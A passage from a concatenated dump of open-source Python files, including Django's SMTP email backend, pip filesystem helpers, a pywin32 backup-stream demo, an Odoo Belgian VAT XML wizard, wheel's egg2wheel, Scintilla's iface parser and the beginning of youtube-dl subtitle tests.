self.use_tls = settings.EMAIL_USE_TLS
else:
self.use_tls = use_tls
self.connection = None
self._lock = threading.RLock()
def open(self):
"""
Ensures we have a connection to the email server. Returns whether or
not a new connection was required (True or False).
"""
if self.connection:
# Nothing to do if the connection is already open.
return False
try:
# If local_hostname is not specified, socket.getfqdn() gets used.
# For performance, we use the cached FQDN for local_hostname.
self.connection = smtplib.SMTP(self.host, self.port,
local_hostname=DNS_NAME.get_fqdn())
if self.use_tls:
self.connection.ehlo()
self.connection.starttls()
self.connection.ehlo()
if self.username and self.password:
self.connection.login(self.username, self.password)
return True
except:
if not self.fail_silently:
raise
def close(self):
"""Closes the connection to the email server."""
if self.connection is None:
return
try:
try:
self.connection.quit()
except (ssl.SSLError, smtplib.SMTPServerDisconnected):
# This happens when calling quit() on a TLS connection
# sometimes, or when the connection was already disconnected
# by the server.
self.connection.close()
except:
if self.fail_silently:
return
raise
finally:
self.connection = None
def send_messages(self, email_messages):
"""
Sends one or more EmailMessage objects and returns the number of email
messages sent.
"""
if not email_messages:
return
with self._lock:
new_conn_created = self.open()
if not self.connection:
# We failed silently on open().
# Trying to send would be pointless.
return
num_sent = 0
for message in email_messages:
sent = self._send(message)
if sent:
num_sent += 1
if new_conn_created:
self.close()
return num_sent
def _send(self, email_message):
"""A helper method that does the actual sending."""
if not email_message.recipients():
return False
from_email = sanitize_address(email_message.from_email, email_message.encoding)
recipients = [sanitize_address(addr, email_message.encoding)
for addr in email_message.recipients()]
message = email_message.message()
charset = message.get_charset().get_output_charset() if message.get_charset() else 'utf-8'
try:
self.connection.sendmail(from_email, recipients,
force_bytes(message.as_string(), charset))
except:
if not self.fail_silently:
raise
return False
return True
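# Usage sketch (values hypothetical; Django normally builds this backend via
# django.core.mail.get_connection()):
# backend = EmailBackend(host='smtp.example.com', port=587, use_tls=True)
# sent_count = backend.send_messages([email_message])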
|
chenss/ChatRoom | refs/heads/master | 14.5 已经能运行(虽然有很多Warning)的Django-nonrel框架/django/contrib/gis/db/backends/mysql/base.py | 308 | from django.db.backends.mysql.base import *
from django.db.backends.mysql.base import DatabaseWrapper as MySQLDatabaseWrapper
from django.contrib.gis.db.backends.mysql.creation import MySQLCreation
from django.contrib.gis.db.backends.mysql.introspection import MySQLIntrospection
from django.contrib.gis.db.backends.mysql.operations import MySQLOperations
class DatabaseWrapper(MySQLDatabaseWrapper):
def __init__(self, *args, **kwargs):
super(DatabaseWrapper, self).__init__(*args, **kwargs)
self.creation = MySQLCreation(self)
self.ops = MySQLOperations()
self.introspection = MySQLIntrospection(self)
|
alanjw/GreenOpenERP-Win-X86 | refs/heads/7.0 | python/Lib/site-packages/win32/Demos/BackupRead_BackupWrite.py | 4 | ## demonstrates using BackupRead and BackupWrite to copy all of a file's data streams
import win32file, win32api, win32con, win32security, ntsecuritycon
from win32com import storagecon
import pythoncom, pywintypes
import struct, traceback
from pywin32_testutil import str2bytes, ob2memory
all_sd_info=win32security.DACL_SECURITY_INFORMATION| \
            win32security.OWNER_SECURITY_INFORMATION|win32security.GROUP_SECURITY_INFORMATION
tempdir=win32api.GetTempPath()
tempfile=win32api.GetTempFileName(tempdir,'bkr')[0]
outfile=win32api.GetTempFileName(tempdir,'out')[0]
print 'Filename:',tempfile,'Output file:',outfile
f=open(tempfile,'w')
f.write('some random junk'+'x'*100)
f.close()
## add a couple of alternate data streams
f=open(tempfile+':streamdata','w')
f.write('data written to alternate stream'+'y'*100)
f.close()
f=open(tempfile+':anotherstream','w')
f.write('z'*100)
f.close()
## add Summary Information, which is stored as a separate stream
m=storagecon.STGM_READWRITE | storagecon.STGM_SHARE_EXCLUSIVE |storagecon.STGM_DIRECT
pss=pythoncom.StgOpenStorageEx(tempfile, m, storagecon.STGFMT_FILE, 0 , pythoncom.IID_IPropertySetStorage,None)
ps=pss.Create(pythoncom.FMTID_SummaryInformation,pythoncom.IID_IPropertyStorage,0,storagecon.STGM_READWRITE|storagecon.STGM_SHARE_EXCLUSIVE)
ps.WriteMultiple((storagecon.PIDSI_KEYWORDS,storagecon.PIDSI_COMMENTS),('keywords','comments'))
ps=None
pss=None
## add a custom security descriptor to make sure we don't
## get a default that would always be the same for both files in temp dir
new_sd=pywintypes.SECURITY_DESCRIPTOR()
sid=win32security.LookupAccountName('','EveryOne')[0]
acl=pywintypes.ACL()
acl.AddAccessAllowedAce(1, win32con.GENERIC_READ, sid)
acl.AddAccessAllowedAce(1, ntsecuritycon.FILE_APPEND_DATA, sid)
acl.AddAccessAllowedAce(1, win32con.GENERIC_WRITE, sid)
acl.AddAccessAllowedAce(1, ntsecuritycon.FILE_ALL_ACCESS, sid)
new_sd.SetSecurityDescriptorDacl(True, acl, False)
win32security.SetFileSecurity(tempfile,win32security.DACL_SECURITY_INFORMATION,new_sd)
sa=pywintypes.SECURITY_ATTRIBUTES()
sa.bInheritHandle=True
h=win32file.CreateFile(tempfile, win32con.GENERIC_ALL ,win32con.FILE_SHARE_READ,
sa, win32con.OPEN_EXISTING, win32file.FILE_FLAG_BACKUP_SEMANTICS , None)
outh=win32file.CreateFile(outfile, win32con.GENERIC_ALL ,win32con.FILE_SHARE_READ|win32con.FILE_SHARE_WRITE,
sa, win32con.OPEN_EXISTING, win32file.FILE_FLAG_BACKUP_SEMANTICS , None)
ctxt=0
outctxt=0
buf=None
readsize=100
while 1:
bytes_read, buf, ctxt=win32file.BackupRead(h, readsize, buf, False, True, ctxt)
if bytes_read==0:
break
bytes_written, outctxt=win32file.BackupWrite(outh, bytes_read, buf, False, True, outctxt)
print 'Written:',bytes_written,'Context:',outctxt
win32file.BackupRead(h, 0, buf, True, True, ctxt)
win32file.BackupWrite(outh, 0, str2bytes(''), True, True, outctxt)
win32file.CloseHandle(h)
win32file.CloseHandle(outh)
assert open(tempfile).read()==open(outfile).read(),"File contents differ !"
assert open(tempfile+':streamdata').read()==open(outfile+':streamdata').read(),"streamdata contents differ !"
assert open(tempfile+':anotherstream').read()==open(outfile+':anotherstream').read(),"anotherstream contents differ !"
assert ob2memory(win32security.GetFileSecurity(tempfile,all_sd_info))[:]== \
ob2memory(win32security.GetFileSecurity(outfile, all_sd_info))[:], "Security descriptors are different !"
## also should check Summary Info programmatically
|
google/material-design-icons | refs/heads/master | update/venv/lib/python3.9/site-packages/pip/_internal/utils/filesystem.py | 2 | import fnmatch
import os
import os.path
import random
import shutil
import stat
import sys
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
from typing import Any, BinaryIO, Iterator, List, Union, cast
from pip._vendor.tenacity import retry, stop_after_delay, wait_fixed
from pip._internal.utils.compat import get_path_uid
from pip._internal.utils.misc import format_size
def check_path_owner(path):
# type: (str) -> bool
# If we don't have a way to check the effective uid of this process, then
# we'll just assume that we own the directory.
if sys.platform == "win32" or not hasattr(os, "geteuid"):
return True
assert os.path.isabs(path)
previous = None
while path != previous:
if os.path.lexists(path):
# Check if path is writable by current user.
if os.geteuid() == 0:
# Special handling for root user in order to handle properly
# cases where users use sudo without -H flag.
try:
path_uid = get_path_uid(path)
except OSError:
return False
return path_uid == 0
else:
return os.access(path, os.W_OK)
else:
previous, path = path, os.path.dirname(path)
return False # assume we don't own the path
def copy2_fixed(src, dest):
# type: (str, str) -> None
"""Wrap shutil.copy2() but map errors copying socket files to
SpecialFileError as expected.
See also https://bugs.python.org/issue37700.
"""
try:
shutil.copy2(src, dest)
except OSError:
for f in [src, dest]:
try:
is_socket_file = is_socket(f)
except OSError:
# An error has already occurred. Another error here is not
# a problem and we can ignore it.
pass
else:
if is_socket_file:
raise shutil.SpecialFileError(f"`{f}` is a socket")
raise
def is_socket(path):
# type: (str) -> bool
return stat.S_ISSOCK(os.lstat(path).st_mode)
@contextmanager
def adjacent_tmp_file(path, **kwargs):
# type: (str, **Any) -> Iterator[BinaryIO]
"""Return a file-like object pointing to a tmp file next to path.
The file is created securely and is ensured to be written to disk
after the context reaches its end.
kwargs will be passed to tempfile.NamedTemporaryFile to control
the way the temporary file will be opened.
"""
with NamedTemporaryFile(
delete=False,
dir=os.path.dirname(path),
prefix=os.path.basename(path),
suffix=".tmp",
**kwargs,
) as f:
result = cast(BinaryIO, f)
try:
yield result
finally:
result.flush()
os.fsync(result.fileno())
# Tenacity raises RetryError by default, explicitly raise the original exception
_replace_retry = retry(reraise=True, stop=stop_after_delay(1), wait=wait_fixed(0.25))
replace = _replace_retry(os.replace)
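# Usage sketch for adjacent_tmp_file() + replace() (an atomic-ish update of
# ``target``, a hypothetical path):
# with adjacent_tmp_file(target) as f:
#     f.write(b'new contents')
# replace(f.name, target)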
# test_writable_dir and _test_writable_dir_win are copied from Flit,
# with the author's agreement to also place them under pip's license.
def test_writable_dir(path):
# type: (str) -> bool
"""Check if a directory is writable.
Uses os.access() on POSIX, tries creating files on Windows.
"""
# If the directory doesn't exist, find the closest parent that does.
while not os.path.isdir(path):
parent = os.path.dirname(path)
if parent == path:
break # Should never get here, but infinite loops are bad
path = parent
if os.name == "posix":
return os.access(path, os.W_OK)
return _test_writable_dir_win(path)
def _test_writable_dir_win(path):
# type: (str) -> bool
# os.access doesn't work on Windows: http://bugs.python.org/issue2528
# and we can't use tempfile: http://bugs.python.org/issue22107
basename = "accesstest_deleteme_fishfingers_custard_"
alphabet = "abcdefghijklmnopqrstuvwxyz0123456789"
for _ in range(10):
name = basename + "".join(random.choice(alphabet) for _ in range(6))
file = os.path.join(path, name)
try:
fd = os.open(file, os.O_RDWR | os.O_CREAT | os.O_EXCL)
except FileExistsError:
pass
except PermissionError:
# This could be because there's a directory with the same name.
# But it's highly unlikely there's a directory called that,
# so we'll assume it's because the parent dir is not writable.
# This could as well be because the parent dir is not readable,
# due to non-privileged user access.
return False
else:
os.close(fd)
os.unlink(file)
return True
# This should never be reached
raise OSError("Unexpected condition testing for writable directory")
def find_files(path, pattern):
# type: (str, str) -> List[str]
"""Returns a list of absolute paths of files beneath path, recursively,
with filenames which match the UNIX-style shell glob pattern."""
result = [] # type: List[str]
for root, _, files in os.walk(path):
matches = fnmatch.filter(files, pattern)
result.extend(os.path.join(root, f) for f in matches)
return result
def file_size(path):
# type: (str) -> Union[int, float]
# If it's a symlink, return 0.
if os.path.islink(path):
return 0
return os.path.getsize(path)
def format_file_size(path):
# type: (str) -> str
return format_size(file_size(path))
def directory_size(path):
# type: (str) -> Union[int, float]
size = 0.0
for root, _dirs, files in os.walk(path):
for filename in files:
file_path = os.path.join(root, filename)
size += file_size(file_path)
return size
def format_directory_size(path):
# type: (str) -> str
return format_size(directory_size(path))
|
ryfeus/lambda-packs | refs/heads/master | Tensorflow/source/pbr/hooks/base.py | 101 | # Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
class BaseConfig(object):
section = None
def __init__(self, config):
self._global_config = config
self.config = self._global_config.get(self.section, dict())
self.pbr_config = config.get('pbr', dict())
def run(self):
self.hook()
self.save()
def hook(self):
pass
def save(self):
self._global_config[self.section] = self.config
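# Sketch of a concrete hook (section name hypothetical): subclasses set
# ``section`` and override ``hook()`` to mutate ``self.config`` in place;
# ``run()`` then writes the section back into the global config.
# class ExampleConfig(BaseConfig):
#     section = 'example'
#     def hook(self):
#         self.config.setdefault('key', 'value')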
|
hmen89/odoo | refs/heads/master | addons/l10n_be/wizard/l10n_be_vat_intra.py | 332 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# Adapted by Noviat to
# - make the 'mand_id' field optional
# - support Noviat tax code scheme
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
import base64
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.report import report_sxw
class partner_vat_intra(osv.osv_memory):
"""
Partner Vat Intra
"""
_name = "partner.vat.intra"
_description = 'Partner VAT Intra'
def _get_xml_data(self, cr, uid, context=None):
if context.get('file_save', False):
return base64.encodestring(context['file_save'].encode('utf8'))
return ''
def _get_europe_country(self, cursor, user, context=None):
return self.pool.get('res.country').search(cursor, user, [('code', 'in', ['AT', 'BG', 'CY', 'CZ', 'DK', 'EE', 'FI', 'FR', 'DE', 'GR', 'HU', 'IE', 'IT', 'LV', 'LT', 'LU', 'MT', 'NL', 'PL', 'PT', 'RO', 'SK', 'SI', 'ES', 'SE', 'GB'])])
_columns = {
'name': fields.char('File Name'),
'period_code': fields.char('Period Code', size=6, required=True, help='''This is where you have to set the period code for the intracom declaration using the format: ppyyyy
PP can stand for a month: from '01' to '12'.
PP can stand for a trimester: '31','32','33','34'
The first figure means that it is a trimester,
The second figure identify the trimester.
PP can stand for a complete fiscal year: '00'.
YYYY stands for the year (4 positions).
'''
),
'period_ids': fields.many2many('account.period', 'account_period_rel', 'acc_id', 'period_id', 'Period (s)', help = 'Select here the period(s) you want to include in your intracom declaration'),
'tax_code_id': fields.many2one('account.tax.code', 'Company', domain=[('parent_id', '=', False)], help="Keep empty to use the user's company", required=True),
'test_xml': fields.boolean('Test XML file', help="Sets the XML output as test file"),
'mand_id' : fields.char('Reference', help="Reference given by the Representative of the sending company."),
'msg': fields.text('File created', readonly=True),
'no_vat': fields.text('Partner With No VAT', readonly=True, help="The Partner whose VAT number is not defined and they are not included in XML File."),
'file_save' : fields.binary('Save File', readonly=True),
'country_ids': fields.many2many('res.country', 'vat_country_rel', 'vat_id', 'country_id', 'European Countries'),
'comments': fields.text('Comments'),
}
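    # Period code examples (illustrative, following the help text above):
    # '012014' = January 2014, '312014' = first trimester 2014,
    # '002014' = the whole fiscal year 2014.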
def _get_tax_code(self, cr, uid, context=None):
obj_tax_code = self.pool.get('account.tax.code')
obj_user = self.pool.get('res.users')
company_id = obj_user.browse(cr, uid, uid, context=context).company_id.id
tax_code_ids = obj_tax_code.search(cr, uid, [('company_id', '=', company_id), ('parent_id', '=', False)], context=context)
return tax_code_ids and tax_code_ids[0] or False
_defaults = {
'country_ids': _get_europe_country,
'file_save': _get_xml_data,
'name': 'vat_intra.xml',
'tax_code_id': _get_tax_code,
}
def _get_datas(self, cr, uid, ids, context=None):
"""Collects require data for vat intra xml
:param ids: id of wizard.
:return: dict of all data to be used to generate xml for Partner VAT Intra.
:rtype: dict
"""
if context is None:
context = {}
obj_user = self.pool.get('res.users')
obj_sequence = self.pool.get('ir.sequence')
obj_partner = self.pool.get('res.partner')
xmldict = {}
post_code = street = city = country = data_clientinfo = ''
seq = amount_sum = 0
wiz_data = self.browse(cr, uid, ids[0], context=context)
comments = wiz_data.comments
if wiz_data.tax_code_id:
data_company = wiz_data.tax_code_id.company_id
else:
data_company = obj_user.browse(cr, uid, uid, context=context).company_id
# Get Company vat
company_vat = data_company.partner_id.vat
if not company_vat:
raise osv.except_osv(_('Insufficient Data!'),_('No VAT number associated with your company.'))
company_vat = company_vat.replace(' ','').upper()
issued_by = company_vat[:2]
if len(wiz_data.period_code) != 6:
raise osv.except_osv(_('Error!'), _('Period code is not valid.'))
if not wiz_data.period_ids:
raise osv.except_osv(_('Insufficient Data!'),_('Please select at least one Period.'))
p_id_list = obj_partner.search(cr, uid, [('vat','!=',False)], context=context)
if not p_id_list:
raise osv.except_osv(_('Insufficient Data!'),_('No partner has a VAT number associated with him.'))
seq_declarantnum = obj_sequence.get(cr, uid, 'declarantnum')
dnum = company_vat[2:] + seq_declarantnum[-4:]
addr = obj_partner.address_get(cr, uid, [data_company.partner_id.id], ['invoice'])
email = data_company.partner_id.email or ''
phone = data_company.partner_id.phone or ''
if addr.get('invoice',False):
ads = obj_partner.browse(cr, uid, [addr['invoice']])[0]
city = (ads.city or '')
post_code = (ads.zip or '')
if ads.street:
street = ads.street
if ads.street2:
street += ' '
street += ads.street2
if ads.country_id:
country = ads.country_id.code
if not country:
country = company_vat[:2]
if not email:
raise osv.except_osv(_('Insufficient Data!'),_('No email address associated with the company.'))
if not phone:
raise osv.except_osv(_('Insufficient Data!'),_('No phone associated with the company.'))
xmldict.update({
'company_name': data_company.name,
'company_vat': company_vat,
'vatnum': company_vat[2:],
'mand_id': wiz_data.mand_id,
'sender_date': str(time.strftime('%Y-%m-%d')),
'street': street,
'city': city,
'post_code': post_code,
'country': country,
'email': email,
'phone': phone.replace('/','').replace('.','').replace('(','').replace(')','').replace(' ',''),
'period': wiz_data.period_code,
'clientlist': [],
'comments': comments,
'issued_by': issued_by,
})
#tax code 44: services
#tax code 46L: normal good deliveries
#tax code 46T: ABC good deliveries
        #tax code 48xxx: credit note on tax code xxx
codes = ('44', '46L', '46T', '48s44', '48s46L', '48s46T')
cr.execute('''SELECT p.name As partner_name, l.partner_id AS partner_id, p.vat AS vat,
(CASE WHEN t.code = '48s44' THEN '44'
WHEN t.code = '48s46L' THEN '46L'
WHEN t.code = '48s46T' THEN '46T'
ELSE t.code END) AS intra_code,
SUM(CASE WHEN t.code in ('48s44','48s46L','48s46T') THEN -l.tax_amount ELSE l.tax_amount END) AS amount
FROM account_move_line l
LEFT JOIN account_tax_code t ON (l.tax_code_id = t.id)
LEFT JOIN res_partner p ON (l.partner_id = p.id)
WHERE t.code IN %s
AND l.period_id IN %s
AND t.company_id = %s
GROUP BY p.name, l.partner_id, p.vat, intra_code''', (codes, tuple([p.id for p in wiz_data.period_ids]), data_company.id))
p_count = 0
for row in cr.dictfetchall():
if not row['vat']:
row['vat'] = ''
p_count += 1
seq += 1
amt = row['amount'] or 0.0
amount_sum += amt
intra_code = row['intra_code'] == '44' and 'S' or (row['intra_code'] == '46L' and 'L' or (row['intra_code'] == '46T' and 'T' or ''))
xmldict['clientlist'].append({
'partner_name': row['partner_name'],
'seq': seq,
'vatnum': row['vat'][2:].replace(' ','').upper(),
'vat': row['vat'],
'country': row['vat'][:2],
'amount': round(amt,2),
'intra_code': row['intra_code'],
'code': intra_code})
xmldict.update({'dnum': dnum, 'clientnbr': str(seq), 'amountsum': round(amount_sum,2), 'partner_wo_vat': p_count})
return xmldict
def create_xml(self, cursor, user, ids, context=None):
"""Creates xml that is to be exported and sent to estate for partner vat intra.
:return: Value for next action.
:rtype: dict
"""
mod_obj = self.pool.get('ir.model.data')
xml_data = self._get_datas(cursor, user, ids, context=context)
month_quarter = xml_data['period'][:2]
year = xml_data['period'][2:]
data_file = ''
# Can't we do this by etree?
data_head = """<?xml version="1.0" encoding="ISO-8859-1"?>
<ns2:IntraConsignment xmlns="http://www.minfin.fgov.be/InputCommon" xmlns:ns2="http://www.minfin.fgov.be/IntraConsignment" IntraListingsNbr="1">
<ns2:Representative>
<RepresentativeID identificationType="NVAT" issuedBy="%(issued_by)s">%(vatnum)s</RepresentativeID>
<Name>%(company_name)s</Name>
<Street>%(street)s</Street>
<PostCode>%(post_code)s</PostCode>
<City>%(city)s</City>
<CountryCode>%(country)s</CountryCode>
<EmailAddress>%(email)s</EmailAddress>
<Phone>%(phone)s</Phone>
</ns2:Representative>""" % (xml_data)
if xml_data['mand_id']:
data_head += '\n\t\t<ns2:RepresentativeReference>%(mand_id)s</ns2:RepresentativeReference>' % (xml_data)
data_comp_period = '\n\t\t<ns2:Declarant>\n\t\t\t<VATNumber>%(vatnum)s</VATNumber>\n\t\t\t<Name>%(company_name)s</Name>\n\t\t\t<Street>%(street)s</Street>\n\t\t\t<PostCode>%(post_code)s</PostCode>\n\t\t\t<City>%(city)s</City>\n\t\t\t<CountryCode>%(country)s</CountryCode>\n\t\t\t<EmailAddress>%(email)s</EmailAddress>\n\t\t\t<Phone>%(phone)s</Phone>\n\t\t</ns2:Declarant>' % (xml_data)
if month_quarter.startswith('3'):
data_comp_period += '\n\t\t<ns2:Period>\n\t\t\t<ns2:Quarter>'+month_quarter[1]+'</ns2:Quarter> \n\t\t\t<ns2:Year>'+year+'</ns2:Year>\n\t\t</ns2:Period>'
elif month_quarter.startswith('0') and month_quarter.endswith('0'):
data_comp_period+= '\n\t\t<ns2:Period>\n\t\t\t<ns2:Year>'+year+'</ns2:Year>\n\t\t</ns2:Period>'
else:
data_comp_period += '\n\t\t<ns2:Period>\n\t\t\t<ns2:Month>'+month_quarter+'</ns2:Month> \n\t\t\t<ns2:Year>'+year+'</ns2:Year>\n\t\t</ns2:Period>'
data_clientinfo = ''
for client in xml_data['clientlist']:
if not client['vatnum']:
raise osv.except_osv(_('Insufficient Data!'),_('No vat number defined for %s.') % client['partner_name'])
data_clientinfo +='\n\t\t<ns2:IntraClient SequenceNumber="%(seq)s">\n\t\t\t<ns2:CompanyVATNumber issuedBy="%(country)s">%(vatnum)s</ns2:CompanyVATNumber>\n\t\t\t<ns2:Code>%(code)s</ns2:Code>\n\t\t\t<ns2:Amount>%(amount).2f</ns2:Amount>\n\t\t</ns2:IntraClient>' % (client)
data_decl = '\n\t<ns2:IntraListing SequenceNumber="1" ClientsNbr="%(clientnbr)s" DeclarantReference="%(dnum)s" AmountSum="%(amountsum).2f">' % (xml_data)
data_file += data_head + data_decl + data_comp_period + data_clientinfo + '\n\t\t<ns2:Comment>%(comments)s</ns2:Comment>\n\t</ns2:IntraListing>\n</ns2:IntraConsignment>' % (xml_data)
context = dict(context or {})
context['file_save'] = data_file
model_data_ids = mod_obj.search(cursor, user,[('model','=','ir.ui.view'),('name','=','view_vat_intra_save')], context=context)
resource_id = mod_obj.read(cursor, user, model_data_ids, fields=['res_id'], context=context)[0]['res_id']
return {
'name': _('Save'),
'context': context,
'view_type': 'form',
'view_mode': 'form',
'res_model': 'partner.vat.intra',
'views': [(resource_id,'form')],
'view_id': 'view_vat_intra_save',
'type': 'ir.actions.act_window',
'target': 'new',
}
def preview(self, cr, uid, ids, context=None):
xml_data = self._get_datas(cr, uid, ids, context=context)
datas = {
'ids': [],
'model': 'partner.vat.intra',
'form': xml_data
}
return self.pool['report'].get_action(
cr, uid, [], 'l10n_be.report_l10nvatintraprint', data=datas, context=context
)
class vat_intra_print(report_sxw.rml_parse):
def __init__(self, cr, uid, name, context):
super(vat_intra_print, self).__init__(cr, uid, name, context=context)
self.localcontext.update({
'time': time,
})
class wrapped_vat_intra_print(osv.AbstractModel):
_name = 'report.l10n_be.report_l10nvatintraprint'
_inherit = 'report.abstract_report'
_template = 'l10n_be.report_l10nvatintraprint'
_wrapped_report_class = vat_intra_print
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
zanph/zanph | refs/heads/master | flaskroulette/venv/lib/python2.7/site-packages/wheel/egg2wheel.py | 471 | #!/usr/bin/env python
import os.path
import re
import sys
import tempfile
import zipfile
import wheel.bdist_wheel
import shutil
import distutils.dist
from distutils.archive_util import make_archive
from argparse import ArgumentParser
from glob import iglob
egg_info_re = re.compile(r'''(?P<name>.+?)-(?P<ver>.+?)
(-(?P<pyver>.+?))?(-(?P<arch>.+?))?.egg''', re.VERBOSE)
def egg2wheel(egg_path, dest_dir):
egg_info = egg_info_re.match(os.path.basename(egg_path)).groupdict()
dir = tempfile.mkdtemp(suffix="_e2w")
if os.path.isfile(egg_path):
# assume we have a bdist_egg otherwise
egg = zipfile.ZipFile(egg_path)
egg.extractall(dir)
else:
# support buildout-style installed eggs directories
for pth in os.listdir(egg_path):
src = os.path.join(egg_path, pth)
if os.path.isfile(src):
shutil.copy2(src, dir)
else:
shutil.copytree(src, os.path.join(dir, pth))
dist_info = "%s-%s" % (egg_info['name'], egg_info['ver'])
abi = 'none'
pyver = egg_info['pyver'].replace('.', '')
arch = (egg_info['arch'] or 'any').replace('.', '_').replace('-', '_')
if arch != 'any':
# assume all binary eggs are for CPython
pyver = 'cp' + pyver[2:]
wheel_name = '-'.join((
dist_info,
pyver,
abi,
arch
))
bw = wheel.bdist_wheel.bdist_wheel(distutils.dist.Distribution())
bw.root_is_purelib = egg_info['arch'] is None
dist_info_dir = os.path.join(dir, '%s.dist-info' % dist_info)
bw.egg2dist(os.path.join(dir, 'EGG-INFO'),
dist_info_dir)
bw.write_wheelfile(dist_info_dir, generator='egg2wheel')
bw.write_record(dir, dist_info_dir)
filename = make_archive(os.path.join(dest_dir, wheel_name), 'zip', root_dir=dir)
os.rename(filename, filename[:-3] + 'whl')
shutil.rmtree(dir)
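# CLI usage sketch (paths hypothetical):
#   python egg2wheel.py dist/*.egg -d wheelhouse/
# Each egg is unpacked, its EGG-INFO rewritten as *.dist-info, and the tree
# re-zipped under a wheel filename derived from the egg's name.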
def main():
parser = ArgumentParser()
parser.add_argument('eggs', nargs='*', help="Eggs to convert")
parser.add_argument('--dest-dir', '-d', default=os.path.curdir,
help="Directory to store wheels (default %(default)s)")
parser.add_argument('--verbose', '-v', action='store_true')
args = parser.parse_args()
for pat in args.eggs:
for egg in iglob(pat):
if args.verbose:
sys.stdout.write("{0}... ".format(egg))
egg2wheel(egg, args.dest_dir)
if args.verbose:
sys.stdout.write("OK\n")
if __name__ == "__main__":
main()
|
sanastasiou/notepad-plus-plus | refs/heads/master | scintilla/scripts/Face.py | 56 | # Face.py - module for reading and parsing Scintilla.iface file
# Implemented 2000 by Neil Hodgson neilh@scintilla.org
# Released to the public domain.
# Requires Python 2.5 or later
def sanitiseLine(line):
if line[-1:] == '\n': line = line[:-1]
if line.find("##") != -1:
line = line[:line.find("##")]
line = line.strip()
return line
def decodeFunction(featureVal):
retType, rest = featureVal.split(" ", 1)
nameIdent, params = rest.split("(")
name, value = nameIdent.split("=")
params, rest = params.split(")")
param1, param2 = params.split(",")
return retType, name, value, param1, param2
def decodeEvent(featureVal):
retType, rest = featureVal.split(" ", 1)
nameIdent, params = rest.split("(")
name, value = nameIdent.split("=")
return retType, name, value
def decodeParam(p):
param = p.strip()
type = ""
name = ""
value = ""
if " " in param:
type, nv = param.split(" ")
if "=" in nv:
name, value = nv.split("=")
else:
name = nv
return type, name, value
class Face:
def __init__(self):
self.order = []
self.features = {}
self.values = {}
self.events = {}
def ReadFromFile(self, name):
currentCategory = ""
currentComment = []
currentCommentFinished = 0
file = open(name)
for line in file.readlines():
line = sanitiseLine(line)
if line:
if line[0] == "#":
if line[1] == " ":
if currentCommentFinished:
currentComment = []
currentCommentFinished = 0
currentComment.append(line[2:])
else:
currentCommentFinished = 1
featureType, featureVal = line.split(" ", 1)
if featureType in ["fun", "get", "set"]:
try:
retType, name, value, param1, param2 = decodeFunction(featureVal)
except ValueError:
print("Failed to decode %s" % line)
raise
p1 = decodeParam(param1)
p2 = decodeParam(param2)
self.features[name] = {
"FeatureType": featureType,
"ReturnType": retType,
"Value": value,
"Param1Type": p1[0], "Param1Name": p1[1], "Param1Value": p1[2],
"Param2Type": p2[0], "Param2Name": p2[1], "Param2Value": p2[2],
"Category": currentCategory, "Comment": currentComment
}
if value in self.values:
raise Exception("Duplicate value " + value + " " + name)
self.values[value] = 1
self.order.append(name)
elif featureType == "evt":
retType, name, value = decodeEvent(featureVal)
self.features[name] = {
"FeatureType": featureType,
"ReturnType": retType,
"Value": value,
"Category": currentCategory, "Comment": currentComment
}
if value in self.events:
raise Exception("Duplicate event " + value + " " + name)
self.events[value] = 1
self.order.append(name)
elif featureType == "cat":
currentCategory = featureVal
elif featureType == "val":
try:
name, value = featureVal.split("=", 1)
except ValueError:
print("Failure %s" % featureVal)
raise Exception()
self.features[name] = {
"FeatureType": featureType,
"Category": currentCategory,
"Value": value }
self.order.append(name)
elif featureType == "enu" or featureType == "lex":
name, value = featureVal.split("=", 1)
self.features[name] = {
"FeatureType": featureType,
"Category": currentCategory,
"Value": value }
self.order.append(name)
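# Usage sketch (the .iface path is hypothetical):
# face = Face()
# face.ReadFromFile('../include/Scintilla.iface')
# for name in face.order:
#     print(face.features[name]["FeatureType"], name)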
|
linglung/ytdl | refs/heads/master | test/test_subtitles.py | 21 | #!/usr/bin/env python
from __future__ import unicode_literals
# Allow direct execution
import os
import sys
import unittest
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
from test.helper import FakeYDL, md5
from youtube_dl.extractor import (
YoutubeIE,
DailymotionIE,
TEDIE,
VimeoIE,
WallaIE,
CeskaTelevizeIE,
LyndaIE,
NPOIE,
ComedyCentralIE,
NRKTVIE,
RaiTVIE,
VikiIE,
ThePlatformIE,
ThePlatformFeedIE,
RTVEALaCartaIE,
FunnyOrDieIE,
DemocracynowIE,
)
class BaseTestSubtitles(unittest.TestCase):
url = None
IE = None
def setUp(self):
self.DL = FakeYDL()
self.ie = self.IE()
self.DL.add_info_extractor(self.ie)
def getInfoDict(self):
info_dict = self.DL.extract_info(self.url, download=False)
return info_dict
def getSubtitles(self):
info_dict = self.getInfoDict()
subtitles = info_dict['requested_subtitles']
if not subtitles:
return subtitles
for sub_info in subtitles.values():
if sub_info.get('data') is None:
uf = self.DL.urlopen(sub_info['url'])
sub_info['data'] = uf.read().decode('utf-8')
return dict((l, sub_info['data']) for l, sub_info in subtitles.items())
class TestYoutubeSubtitles(BaseTestSubtitles):
url = 'QRS8MkLhQmM'
IE = YoutubeIE
def test_youtube_allsubtitles(self):
self.DL.params['writesubtitles'] = True
self.DL.params['allsubtitles'] = True
subtitles = self.getSubtitles()
self.assertEqual(len(subtitles.keys()), 13)
